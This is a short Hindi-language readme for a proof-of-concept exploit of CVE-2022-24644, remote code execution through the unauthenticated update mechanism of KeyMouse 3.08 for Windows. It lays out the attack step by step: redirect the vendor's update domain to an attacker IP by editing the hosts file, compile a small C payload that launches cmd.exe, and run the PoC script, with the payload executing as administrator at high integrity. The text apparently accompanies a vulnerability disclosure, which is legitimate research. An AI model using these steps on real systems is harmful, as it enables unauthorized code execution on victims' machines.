
CVE-2022-24644 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो KeyMouse Windows 3.08 अद्यतन तंत्र के विरुद्ध DNS स्पूफिंग के माध्यम से अप्रमाणित रिमोट कोड निष्पादन का प्रदर्शन करता है।
ZZ Inc. KeyMouse 3.08 (Windows) अप्रमाणित अद्यतन दूरस्थ कोड निष्पादन भेद्यता
उपयोग: python3 cve-2022-24644_poc.py
रिपोर्ट में विवरण gerr.re पर उपलब्ध है।
www.keymouse.com को हमारे आक्रमणकर्ता आईपी पर नकली बनाएं;
c:\windows\system32\drivers\etc\hosts को संपादित करना सबसे आसान है।
proof.c संकलित करें, उदाहरण के लिए i686-w64-mingw32-gcc proof.c -o proof.exe का उपयोग करके;#include <windows.h>
int main(int argc, char const *argv[]){
WinExec("cmd.exe",1);
return TRUE;
}
परिणामस्वरूप, proof.exe उच्च अखंडता पर प्रशासक उपयोगकर्ता के संदर्भ में निष्पादित होता है।